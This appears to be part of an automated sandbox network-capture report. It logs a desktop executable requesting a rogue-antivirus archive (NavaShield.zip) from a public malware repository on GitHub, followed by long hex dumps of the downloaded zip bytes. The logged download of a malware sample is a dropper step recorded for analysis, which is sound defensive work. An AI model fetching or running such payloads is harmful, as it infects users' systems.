                                                                                                                                                2022-09-29 12:51:44 UTC17406INData Raw: 5d 5f b9 2c bf 4d 95 0c 04 1a c0 71 6c 14 4c c1 a3 12 52 a6 5c 0c 9f 55 7d aa e2 5b 61 53 55 43 b9 b8 4a 3e 3a bd 63 cf a9 8e 1b 20 2d ba 1c 0f 1e 8c 77 76 66 df fb 0b 24 fd ef bb 4c d4 4e f9 fd 9f 3d d0 50 6f ad 52 11 eb 56 f6 4a 74 3f 46 41 46 a7 0d 30 9b 19 8f 80 4a 22 40 61 b9 50 2a bb d2 e1 9b 41 f6 4c ce 0b 0b 0d 5a a8 4b 6f 19 a8 1f 3e 10 d0 03 c2 ea 05 2f 05 e8 a1 c8 2c ab 80 d8 c6 78 33 9e cc e6 9e 85 99 67 10 c6 d7 64 d5 a9 26 99 df 85 56 d1 de e2 07 bc 79 aa 00 41 16 25 bb c9 15 2d b9 44 a3 52 f7 ce 38 51 5e 60 0e b7 91 81 e5 11 6b ad a7 49 46 17 cc 5c 71 e9 db 0b 40 d2 17 0a d8 2c 88 07 cc 26 79 12 33 db 1a 0c 80 1f af 81 0a d8 07 21 2f cd fb 76 38 27 ee 9c 0d 4c c3 e0 ad 17 44 f8 0e fc af 63 c7 63 c5 2a c3 41 dd 40 cd 68 7a f2 8c 5e 9b c5 bc
                                                                                                                                                Data Ascii: ]_,MqlLR\U}[aSUCJ>:c -wvf$LN=PoRVJt?FAF0J"@aP*ALZKo>/,x3gd&VyA%-DR8Q^`kIF\q@,&y3!/v8'LDcc*A@hz^


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                46192.168.2.549746140.82.121.3443C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:51:44 UTC17414OUTGET /Endermanch/MalwareDatabase/raw/master/rogues/NavaShield.zip HTTP/1.1
                                                                                                                                                Host: github.com
                                                                                                                                                2022-09-29 12:51:45 UTC17414INHTTP/1.1 302 Found
                                                                                                                                                Server: GitHub.com
                                                                                                                                                Date: Thu, 29 Sep 2022 12:51:45 GMT
                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/NavaShield.zip
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                2022-09-29 12:51:45 UTC17415INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                47192.168.2.549747185.199.108.133443C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:51:45 UTC17416OUTGET /Endermanch/MalwareDatabase/master/rogues/NavaShield.zip HTTP/1.1
                                                                                                                                                Host: raw.githubusercontent.com
                                                                                                                                                2022-09-29 12:51:45 UTC17417INHTTP/1.1 200 OK
                                                                                                                                                Connection: close
                                                                                                                                                Content-Length: 9761692
                                                                                                                                                Cache-Control: max-age=300
                                                                                                                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                Content-Type: application/zip
                                                                                                                                                ETag: "661ea63fbc62342073d5bfd4679b232432b87a10a3c0d0671861822eaa1ccd08"
                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                X-GitHub-Request-Id: 0813:A32C:790B7E:86A2B4:6335935A
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Date: Thu, 29 Sep 2022 12:51:45 GMT
                                                                                                                                                Via: 1.1 varnish
                                                                                                                                                X-Served-By: cache-mxp6940-MXP
                                                                                                                                                X-Cache: HIT
                                                                                                                                                X-Cache-Hits: 0
                                                                                                                                                X-Timer: S1664455905.335589,VS0,VE160
                                                                                                                                                Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                X-Fastly-Request-ID: fb8de8735ba7ac9f008795f943bbe8dba1a4b9b2
                                                                                                                                                Expires: Thu, 29 Sep 2022 12:56:45 GMT
                                                                                                                                                Source-Age: 0
                                                                                                                                                2022-09-29 12:51:45 UTC17417INData Raw: 50 4b 03 04 14 00 01 00 08 00 46 7f 97 48 0d c4 ec 04 e4 f2 94 00 b9 d8 9a 00 19 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 4e 61 76 61 53 68 69 65 6c 64 2e 65 78 65 cf 6d a1 a8 22 51 3b 7e 26 d3 2c d3 1e d3 0f fb 79 9a a0 19 5b 88 9d ad 57 3c df ac ba c9 c7 af 6e 26 53 32 38 24 ff 4c 32 e8 99 fc 7f 63 d8 b0 1c 6b 08 5a ad 3a 8d 5f 20 c0 7d d9 f8 6c a1 e0 0c e0 af 4f c5 c6 96 99 cf 52 28 92 1b 51 3a 4c de d2 c6 ea 72 65 b9 81 6f 90 13 e4 53 07 93 1a 71 b9 c4 17 e7 c7 e2 19 e0 31 8e f5 01 84 f2 1f 17 51 b4 f7 93 05 87 81 fd ea 83 25 01 65 8c 97 67 30 bd 7f 9d b2 6e 12 d5 a8 48 7b fd 6f ca 41 88 1c e6 7e d9 86 28 f2 74 56 23 19 f7 76 1e 92 7d 53 7a 0e 88 c3 c1 08 86 65 d1 fb 1b 61 d9 41 53 0a 20 d8 ef 78 d0 0a 9e d1 05 9c 45 58 25 42 54 b0 9f 14 29 b9 0f 06
                                                                                                                                                Data Ascii: PKFHEndermanch@NavaShield.exem"Q;~&,y[W<n&S28$L2ckZ:_ }lOR(Q:LreoSq1Q%eg0nH{oA~(tV#v}SzeaAS xEX%BT)
                                                                                                                                                2022-09-29 12:51:45 UTC17433INData Raw: eb 21 f9 9a 27 c5 20 69 ac 54 d7 f2 84 24 ed e5 05 77 1b 42 59 f0 2d 3c 4e d6 a0 ff f8 be 1d a4 b8 73 65 68 5d 4e e3 14 e7 7d 90 9c 33 44 e0 97 47 ac 8b 8f b0 91 38 47 b7 c6 c8 63 bb f4 80 bf 71 24 30 9b df c0 9e a0 26 10 ab ee e6 ec ed f7 02 56 3c be 56 06 fa 3a 1c a3 3e 5a 81 21 66 3e 90 74 2e ca a4 9f 01 71 e7 e9 55 a4 11 57 61 bd 5c 23 70 fe ef 57 47 28 5a 42 10 10 b4 79 48 74 f6 1f b4 4d 05 b2 f4 86 53 b7 86 1d d7 ee 08 8a 3c 99 7d e3 c5 61 35 f1 77 c7 aa 3a 1e 51 63 d2 ad 4e d2 aa d1 09 bb 94 7e b6 03 8f 5f 51 f2 3b 2b ef ce 28 b0 39 3c 0a 5a c7 a7 ea 32 4c 80 b6 43 ec 50 92 df 07 a5 0c 95 c9 03 ce b9 90 12 85 34 c7 f7 23 a8 98 bd 1f b3 0a 25 e3 c6 a3 2d b7 ff 57 e1 7a eb ca e5 28 bb 11 f3 d0 6c 58 9a 30 58 d7 03 4d 60 53 e6 42 ff 55 3c 8c d5 09 51
                                                                                                                                                Data Ascii: !' iT$wBY-<Nseh]N}3DG8Gcq$0&V<V:>Z!f>t.qUWa\#pWG(ZByHtMS<}a5w:QcN~_Q;+(9<Z2LCP4#%-Wz(lX0XM`SBU<Q
                                                                                                                                                2022-09-29 12:51:45 UTC17449INData Raw: 85 81 70 c7 b2 8a fc 50 81 8e fe 06 c4 70 be b7 87 cb b8 c0 15 25 58 c5 44 58 37 90 8c 20 3c a0 93 d6 bf 0f 48 7d 44 b6 cc d6 5b af b6 dc 92 d4 31 1f fa 71 0f 5d e0 0b 9f ee 37 f5 b7 36 5c d0 a1 cf 8e 8e a0 08 21 4f fc be 10 af 45 73 41 b1 dd 3f 02 c8 f5 9c 2a 54 5e 97 44 0a 22 9a b2 6e e4 66 85 9b 3b ff b6 40 52 0d ab b8 b0 27 6d 8e 8b 40 ac ff c5 45 1f bb b8 c3 a4 c1 67 31 0d ad 7d 40 76 a9 5d 64 bb 01 35 33 39 29 f8 6f 38 13 a6 38 69 f8 fe c7 9e 79 bc 93 17 1a bd f8 a7 dc df 41 0d 95 c5 c8 28 b1 e9 ec ac ce 02 44 cb af 42 c7 ad 77 f4 c4 e1 dd 1f 39 a3 76 93 fc e0 03 5c e9 c7 50 e7 cf f4 2e ae 30 89 3c 42 6b bd f6 5a 27 ba 29 6e 85 ca 1d c2 29 dc e4 6b 17 ae 6d 68 a4 ff 0c 45 cd db 02 de bf 14 0d ea 81 f9 ad 8d 67 5f ee 36 c9 93 9e 77 f2 f5 ba b8 85 e8
                                                                                                                                                Data Ascii: pPp%XDX7 <H}D[1q]76\!OEsA?*T^D"nf;@R'm@Eg1}@v]d539)o88iyA(DBw9v\P.0<BkZ')n)kmhEg_6w
                                                                                                                                                2022-09-29 12:51:45 UTC17465INData Raw: d1 fc a7 ba e8 13 6a 8d 4a ba 4f 07 1b fd 9d 8c be b7 46 b7 cb b3 7b b3 98 8c 26 c9 9b 06 b0 4f 8e 4a 6d 10 18 7a fb 3e ac 6c ee 56 46 b2 45 dc ea f1 3c 31 05 3d 49 e1 19 f8 9e f3 8f fd e6 5f 24 d7 c4 47 f2 0a 4e 81 65 ad d6 87 60 cd 0d fa 9f 46 7a 48 54 7f 62 22 7c 21 be c1 24 db 7b bc 61 69 ca 1f 0c 2d 8c 32 16 00 81 a4 7d ba c9 3a cc da c6 5c 4b 25 78 b5 c0 97 2c c3 12 87 4e 38 90 dc 0a ed 07 10 87 c5 be 72 c3 25 aa e5 d4 9c 98 42 99 65 d8 3c 14 28 15 ed c5 80 27 cc 21 52 e1 5c 90 f1 a7 66 9e cf 38 c7 79 b8 6f c5 e3 82 f3 c1 66 4f 30 e1 87 55 82 9c d3 a6 1e d2 27 d0 07 80 23 ca a2 38 d1 62 53 61 af e6 a9 bc 87 10 ef f0 c1 10 a3 bb 56 09 67 97 f0 a4 38 d2 1a 63 fe ca b2 23 02 ca cb 46 be e6 14 9c 73 be cf d2 01 a1 d1 93 cf f9 f5 e8 3a 20 17 81 0d e7 95
                                                                                                                                                Data Ascii: jJOF{&OJmz>lVFE<1=I_$GNe`FzHTb"|!${ai-2}:\K%x,N8r%Be<('!R\f8yofO0U'#8bSaVg8c#Fs:
                                                                                                                                                2022-09-29 12:51:45 UTC17481INData Raw: 24 9f c6 6d 93 aa 6f 56 ea 7f 7c b1 e7 0b 53 83 aa 9d 6f 0e 33 5a fe 5d 0e 40 85 ca 87 aa 77 5b e3 ec 36 03 47 b6 ee 6f 77 b2 8b 44 0c d6 a4 dc 6c 47 b0 8b 30 c6 de b5 05 e7 30 a6 14 60 44 99 e6 41 cf bc 47 17 d2 2d 6a 7d ef 21 a7 04 a7 52 ef a5 a0 c3 2a 9b eb c7 1a 40 8f be 7a 09 2a dc 6c 23 9c a9 ac d6 8a 02 15 84 f2 98 c4 f4 47 be df 7d 3d 8e 87 31 a1 f6 58 87 fb b5 ba f1 69 5e 16 a3 58 81 a4 9c f5 ba ec 0e 76 46 c6 de be ca 88 09 0f 58 16 13 fb 3a fa 00 d4 b5 26 83 cd 8f d8 10 03 1f 80 54 53 54 c9 e8 aa 46 c6 17 f8 62 7e de 5a b9 97 15 6f cb ca 33 cb a6 dc 7a 75 a3 ba 08 20 13 15 d6 be 87 56 21 f8 b3 1d d9 4a c4 ee 62 28 37 cd 03 a2 5c 3e e6 66 d4 68 04 89 48 ea 71 ff 81 a4 bc 34 eb 62 f9 e2 08 cd 53 3a bb 5b d1 3f f1 0c 5b 04 a3 1f a4 01 77 11 6d d1
                                                                                                                                                Data Ascii: $moV|So3Z]@w[6GowDlG00`DAG-j}!R*@z*l#G}=1Xi^XvFX:&TSTFb~Zo3zu V!Jb(7\>fhHq4bS:[?[wm
                                                                                                                                                2022-09-29 12:51:45 UTC17497INData Raw: 4c 76 2a bf 72 0e d4 3f 86 c8 62 e2 4b 3a fa 34 0d 77 af 9e 5f 33 bd fd 80 7f 35 7f 72 7c 65 f8 ab b7 e6 b2 c5 2b 59 3e 20 67 cb 02 4a 77 f9 3b ab 7c 70 63 a7 03 91 e8 ad c5 d7 ce 34 fc 95 38 16 88 f4 39 6e 6e 57 05 5c eb 13 9d 7d 84 62 07 87 7e 48 77 53 2e f0 6f ea 17 30 f7 d2 9f 50 5a de d6 61 50 fa 4c da b8 eb a3 b7 6a 79 43 c6 1f 5d 60 73 48 90 c8 c9 c2 21 85 86 d1 3d ea 68 9a ca 22 fa 23 e2 2f 19 dc 05 fd 1a ed 2a bd 00 38 98 a8 26 1e 1e 0d 8a 7a 86 64 33 36 7c 74 c3 ef 37 17 4a 3d 60 a6 0a 18 69 0b 6d 2d e3 68 0b d6 cf 6c dd fd 2f e4 54 8c d9 9e e0 41 3d 12 1d 97 c1 2d be d3 06 80 8e 9a 45 52 8f 8d db 56 df f5 7e 70 de d1 cf 20 c1 29 51 38 4f 0b f3 46 dd 31 b3 1c bf 57 28 57 5f d4 86 22 ac 18 26 cc 62 f0 28 22 dd 75 7b 10 99 b8 e1 8a 3c 7f 37 a7 9b
                                                                                                                                                Data Ascii: Lv*r?bK:4w_35r|e+Y> gJw;|pc489nnW\}b~HwS.o0PZaPLjyC]`sH!=h"#/*8&zd36|t7J=`im-hl/TA=-ERV~p )Q8OF1W(W_"&b("u{<7
                                                                                                                                                2022-09-29 12:51:45 UTC17513INData Raw: 2a 7b b5 26 2b 5a 68 98 70 1d 36 cb 1e 15 ef 79 b8 32 96 73 7a 82 6f 2e 1a 5b cb 59 07 0b 81 28 62 af bf 70 f0 cd d0 10 41 de 9d b3 d8 73 19 d0 36 40 74 8d 45 f7 a1 5c bd 85 1c d3 5c c9 1e 4b 75 42 5a e8 7e d0 c4 b4 6b 6f 14 d8 42 65 53 c2 f9 0f 77 d8 6a 3a b0 cc dd 2c 01 37 a1 94 67 1d 01 7f 07 27 9e 04 e5 05 62 a0 73 4e 70 f5 bf d0 b0 57 a9 ab 98 f4 87 a3 5a 2e d7 f9 61 13 53 86 1c 95 bd 94 25 af 9a fb 7c 1b d0 c3 9c 23 7d a0 f2 73 32 00 bf 15 c7 93 c8 f1 dc 88 dc ae 88 97 3e 66 e5 b0 67 40 73 0c 30 38 b9 aa c7 08 6a fc e2 af 87 7e 0a 33 b1 3e 42 6f ff 6f a8 f1 5f 43 8e 55 07 3c e3 00 77 eb 85 26 04 89 be a1 db 2d 38 59 2b 3b 3d d7 d9 85 f7 aa 75 c9 f6 c5 75 93 00 0f 03 65 0f 66 62 51 2b 84 6a cb 3d fa 8e 56 80 0c 84 0c 11 40 4e ad 52 3e 58 5e 7b 25 12
                                                                                                                                                Data Ascii: *{&+Zhp6y2szo.[Y(bpAs6@tE\\KuBZ~koBeSwj:,7g'bsNpWZ.aS%|#}s2>fg@s08j~3>Boo_CU<w&-8Y+;=uuefbQ+j=V@NR>X^{%
                                                                                                                                                2022-09-29 12:51:45 UTC17529INData Raw: 31 89 c6 96 63 86 86 fe b7 8f bf 8d 1c 10 08 60 67 0a 6c 56 30 df e7 50 b5 23 35 77 aa 96 c7 35 c7 6a 72 ee 67 10 fb dd 63 d8 75 2e f7 56 5f 06 b2 e3 3c f7 41 49 1a 76 48 47 9c ca 17 24 f1 b9 f1 4e 68 9e 89 e6 d5 b5 c4 f6 73 97 ef ce 90 ee f1 aa 89 0d 2e 17 f6 a9 5e 48 b3 57 13 80 26 a7 19 51 00 1b 28 bb 5d 91 51 79 5a e5 25 37 37 5b 7c 48 c8 e8 76 f4 d4 cd c0 24 75 19 3b 83 b9 cf 52 e8 1a 80 f6 10 3d 94 b4 3c b9 38 ff dc 4c a2 c6 93 d5 ce 45 16 f7 94 9e 10 e0 64 06 f7 97 ad 61 e2 43 ec 11 f5 8b d5 72 6b d3 d4 6e a0 01 64 37 c2 8c 2d 24 c9 89 35 18 42 82 42 dd 8c b9 2b f2 f5 ae 8f 4a 22 fa 85 d3 33 4c 68 56 55 c6 60 74 de f0 1a 7e fa 24 24 1d 8d ce 71 80 9b 24 72 35 a1 91 8a 91 c7 0d fc 8d ce fb e9 41 8c ad 03 de 85 4b b2 67 a0 f1 d9 8e 50 a6 96 3b 66 01
                                                                                                                                                Data Ascii: 1c`glV0P#5w5jrgcu.V_<AIvHG$Nhs.^HW&Q(]QyZ%77[|Hv$u;R=<8LEdaCrknd7-$5BB+J"3LhVU`t~$$q$r5AKgP;f
                                                                                                                                                2022-09-29 12:51:45 UTC17545INData Raw: b3 bf b8 c7 49 50 88 ff bb d2 60 76 f3 22 a2 78 dc a2 4b 30 80 e2 0f 9b b1 17 16 f5 3d 53 d2 9f cb 35 f7 99 37 bd 5b 8e eb 02 16 a5 1b a2 10 9f 27 dd 18 e1 2c db 9a de cf fa be 86 d8 2f 58 a1 ef 4f 18 ba 11 ff ad 64 d7 15 f8 da e7 9a 9c 11 e9 59 82 66 2d 86 40 9a 38 c4 96 d7 1d df 82 f4 e2 dd 2d 71 a8 58 ae 13 9a f9 df 20 6a 31 3c c7 15 7b 42 2b 23 30 2a 32 62 40 71 75 51 9a 60 c0 c9 3a 30 62 95 0a e7 f5 f0 61 22 0c c3 a8 c6 fa f2 82 09 1b 63 bb 7b 30 90 c4 3e cb b7 73 01 0b 74 f8 00 ba a8 3a 86 7a a2 aa b1 dc 41 14 b7 b9 72 a9 35 b8 9b 21 7f bf 78 9c e1 f7 40 48 48 53 00 98 76 68 50 ef 5a 9b 73 72 38 ff b8 08 c9 e3 f5 68 e9 b2 8a 55 68 a8 73 d1 e8 85 44 17 3c c4 2a d5 78 16 70 ac 29 16 a9 1e 7f dd 4e 6b 35 0d 50 d8 dc fc 56 27 91 44 26 94 5f d7 58 39 f0
                                                                                                                                                Data Ascii: IP`v"xK0=S57[',/XOdYf-@8-qX j1<{B+#0*2b@quQ`:0ba"c{0>st:zAr5!x@HHSvhPZsr8hUhsD<*xp)Nk5PV'D&_X9
                                                                                                                                                2022-09-29 12:51:45 UTC17561INData Raw: 26 7e fe 2c 55 f5 6b 0c 0d 9f 14 63 84 53 10 89 fd e5 12 04 19 8b 8e 6f 52 a6 e4 08 5e 64 72 76 43 65 20 7d 86 54 76 a9 1e e6 38 05 d9 6d 2f e9 4f 43 e1 c9 73 da 48 7c 97 40 05 04 ad 49 fa b8 e2 d1 39 03 0a ab a4 50 79 e1 37 eb c6 f6 12 fd cf 7f d1 bc 36 90 44 f9 76 c3 ad 76 7e 2e be be f6 f5 d0 66 d0 58 04 b1 ce 0e a6 24 bc 74 b4 c4 87 22 4a b6 5e e3 ae d7 1e 6d 4e b8 d2 18 8e fb c9 f8 a3 07 9f e2 51 6c 31 c7 85 7f f2 42 4f d5 66 1b d9 7a c5 ae a6 b5 74 dd 44 11 18 9c d1 aa 89 2a e5 8d 1d 2e db b0 66 42 49 cf 06 08 03 7a 7a 10 52 06 fa 8e 12 2b 75 4f 38 09 63 8b 7c 53 c3 3c 18 7a 4c 73 71 38 f5 66 a3 a8 29 d1 1b 88 f4 21 1f 36 77 7b 3c ca 94 af fc 0c ec 4a c2 fa a9 86 17 f1 b6 6d a5 17 21 35 6d 9d be fc 26 d6 d0 40 b8 44 2b be 29 e6 b8 02 82 29 61 65 cd
                                                                                                                                                Data Ascii: &~,UkcSoR^drvCe }Tv8m/OCsH|@I9Py76Dvv~.fX$t"J^mNQl1BOfztD*.fBIzzR+uO8c|S<zLsq8f)!6w{<Jm!5m&@D+))ae
                                                                                                                                                2022-09-29 12:51:45 UTC17577INData Raw: 78 47 11 ac 1c 59 1c 08 1d f2 6e e3 02 fc f8 f7 b4 92 f0 4d b2 ae fb fd 54 e8 d6 3e 5a 22 66 54 86 b2 c3 02 a3 66 cc 8a ab 6f 01 33 09 fb 28 71 41 d7 d0 d3 a6 f5 96 bd 05 8e d8 40 df 5f e1 a8 f1 4e 4a 44 12 ee f4 68 f4 71 12 fc 40 3b d2 1b 88 95 b2 f7 3b b1 52 56 14 95 c2 46 4f f2 95 c6 77 a6 7f d3 7e ab 5b bb df 4b 6b 4b 7c 57 ed fb 46 c8 f1 38 6d 32 7e d3 f5 a4 0c 4b 36 2d ce 2f 38 15 e1 bb 9d 52 a9 45 e0 34 6a 2e 46 8a 2d 9a 47 a1 06 3a 25 18 03 8c 87 bf d4 ce a3 92 8e 73 6d 52 31 50 f2 df 1d 14 01 48 1b e5 f5 ed f9 ba db f5 32 c8 7d 63 6e 85 67 51 0e ae ac 2c 7e 28 95 89 1b ed 86 06 88 93 28 4f 2b 88 fd 7c 9a fd 71 73 1c b3 3a 52 45 71 50 d3 c4 35 e6 75 d7 a7 85 7e 8f 20 43 4b 14 29 dc f5 44 d3 c9 3a 24 ac 6f 6a cb 72 02 97 20 21 ba b8 88 32 a4 43 8f
                                                                                                                                                Data Ascii: xGYnMT>Z"fTfo3(qA@_NJDhq@;;RVFOw~[KkK|WF8m2~K6-/8RE4j.F-G:%smR1PH2}cngQ,~((O+|qs:REqP5u~ CK)D:$ojr !2C
                                                                                                                                                2022-09-29 12:51:45 UTC17593INData Raw: eb 06 0f 23 22 24 33 45 c8 a9 00 55 aa 6c 92 5b dc ee 33 69 3c 67 75 48 d8 c0 a5 dd 9c 1d 94 a6 e2 63 28 4e 80 77 24 8d 74 29 fe 81 07 53 86 86 b3 09 64 fb 7f 27 ac ba a9 de d3 b2 30 d7 6e f7 ae 9e 2c dd b9 73 29 b0 8b 71 72 55 4f 6a 57 c1 57 04 67 3a fb d6 b8 f0 e5 08 7f b2 04 dd 79 b0 fd 0c 2e 0c 23 9f d9 b2 6e c1 94 db 9f 39 c2 0d 9e c1 0d 93 24 9b 03 50 87 4f 7d 91 a8 e4 65 bb 62 20 7e 97 07 aa 81 3f d5 13 35 4f e7 1b ec 4b a7 70 f1 9e 65 e0 b6 66 21 da 65 0f d7 93 a2 c1 c6 22 5b ad 24 fd 06 bc a8 44 eb d5 3c 5e 24 82 72 4d 69 97 fc b6 de ea 5a da bd 64 49 78 a1 fe 2a 2c a9 06 3b 1b 38 6b 62 03 67 9c 92 13 fb aa 98 59 8c fe 4f ac 6f f6 5f 40 7f bd 19 a3 93 91 89 ed a5 e2 ad b8 ea 65 67 a1 9a d4 6a 01 db 5b c8 eb aa 24 38 75 50 5c 7a 97 75 40 94 11 5a
                                                                                                                                                Data Ascii: #"$3EUl[3i<guHc(Nw$t)Sd'0n,s)qrUOjWWg:y.#n9$PO}eb ~?5OKpef!e"[$D<^$rMiZdIx*,;8kbgYOo_@egj[$8uP\zu@Z
                                                                                                                                                2022-09-29 12:51:45 UTC17609INData Raw: 7f 6e e3 b2 10 f3 93 ff cf 70 b2 3b ab b9 e0 95 9b 52 7b 4d 51 51 69 62 25 24 f1 09 7b 6d 6f ce 17 4e 3d e4 08 5c 01 01 fd a2 9e ca d9 2e 6c 50 f9 41 48 32 63 ee cd f3 5f 18 bd 7b 32 52 9d 9a 49 13 c1 83 51 c2 bc 75 d2 e4 57 bf 54 9a b1 3d fe d3 37 75 dc 0d 19 72 cf 72 99 82 81 94 c1 34 06 a6 df bb 1a 74 a0 54 14 1b 7e ea 52 fb 74 4d 04 00 b4 9f 1a 73 9c 37 9a b0 2f fa 8a 7f 68 08 14 67 4d 54 9b 2b 94 5f 81 00 ba 71 e1 18 b3 9e 41 91 68 59 c5 e5 1d c0 fb bd a7 0e f3 f5 c9 81 30 7b 88 ed 91 72 a7 55 33 b5 f5 17 13 29 96 fc 54 29 9a be 3b 18 37 ba 54 e7 9d cd de ef 01 a6 9f 58 1f a0 28 a0 95 ea 2a 8d 39 90 41 c5 fc 5e de 75 9f 58 b0 69 4c 22 ad 86 e7 7b 5a 7a 5e 88 2a dc 95 5e d0 3b fa 3b 75 ca 89 4d e6 ca 08 71 31 b9 4f af 56 fb 3b 41 f1 f7 2e ac 3a 41 4c
                                                                                                                                                Data Ascii: np;R{MQQib%${moN=\.lPAH2c_{2RIQuWT=7urr4tT~RtMs7/hgMT+_qAhY0{rU3)T);7TX(*9A^uXiL"{Zz^*^;;uMq1OV;A.:AL
                                                                                                                                                2022-09-29 12:51:45 UTC17625INData Raw: 48 1b 86 ba 9b 87 94 7e 7a 9c ab 99 6d cc 4f c1 c1 6f d6 3b 46 04 02 50 93 84 87 b1 95 81 77 28 7a 7a d7 b5 26 5c 05 d3 74 9e a3 05 75 01 a8 8e 31 ad 76 86 22 6b 38 8f 49 b1 44 4f c7 94 5c 2d a2 aa c5 01 5b 9d 47 03 6e a4 80 c7 de 06 fa 70 c6 6a 6a 2d 78 e2 4f 6b 42 d8 0c 0b db 7c 78 7e 0b 6e 7d f2 22 b2 d8 e5 11 94 18 be 5f fc 6f 91 c2 a5 c7 6c b3 a9 80 9d 4e 98 9b 2a bd c9 3c 10 b9 0a 04 32 de 2f 33 b3 ab 6d 63 35 44 ef 28 ec 14 0a 76 22 b3 75 11 56 0a ef fc 77 e8 95 b1 4a cc 38 45 09 57 c0 30 5e f7 af 93 5b 1b 26 9a 55 b6 1a ff e7 5b 5b 8d 92 0f 5c 16 99 38 a1 00 a4 9d b1 8b a8 36 bc 3d 01 f3 50 d5 b1 64 99 e6 f8 68 fb 81 c3 c9 51 dd 5a 99 32 11 69 42 5c 18 99 ee b6 b5 00 95 a9 80 8c ce 97 bf bb 85 22 30 07 ae c7 c7 7f ac d0 40 bc 6a 05 00 da 80 c7 90
                                                                                                                                                Data Ascii: H~zmOo;FPw(zz&\tu1v"k8IDO\-[Gnpjj-xOkB|x~n}"_olN*<2/3mc5D(v"uVwJ8EW0^[&U[[\86=PdhQZ2iB\"0@j
                                                                                                                                                2022-09-29 12:51:45 UTC17641INData Raw: e4 23 ae ed 3a c8 98 d6 6b f5 36 ed fa 5f cd a3 70 3f 04 af 0e 64 c0 86 c9 63 b2 0f 10 fa e1 ba 97 40 71 5f 2f 1b 2b 76 af 28 53 35 13 3d de e1 70 44 79 72 21 17 7f 6d ff 80 fb d1 ea b5 7c 09 75 dc 8a f5 6e d0 7b 61 f3 d6 e8 07 02 00 3c 46 35 09 a9 e6 5b e5 db 45 0d dc 4b 35 35 8f 24 83 f7 3d 3c a3 45 25 2a 44 d1 ec 99 c7 2b 62 1f 24 3b 71 3c 7b b8 f0 73 a4 ef 27 54 82 ad 8b d6 ee 30 fd 0b f2 9b 3e 4e c2 ff a3 1e 29 91 f3 a0 ae 38 c4 f6 1b d1 c5 f8 45 19 83 96 0b 77 4f ad fa 43 29 ef 09 3c 06 2c ec 39 0d cd 49 a9 82 ee 1b b8 b8 99 a0 50 e9 7a 1a d5 cf 70 71 6f 84 b4 af 8d e9 56 69 21 5e 95 95 10 13 ce 2d 62 cf 26 86 88 02 cb b9 49 b2 19 b9 6d f3 2e 22 27 70 d9 fd 88 39 5d 16 43 35 24 03 1f c5 12 5d 6c ee 80 31 fa 88 ed 8e 57 c7 43 8a 1c 75 68 81 3e d8 4c
                                                                                                                                                Data Ascii: #:k6_p?dc@q_/+v(S5=pDyr!m|un{a<F5[EK55$=<E%*D+b$;q<{s'T0>N)8EwOC)<,9IPzpqoVi!^-b&Im."'p9]C5$]l1WCuh>L
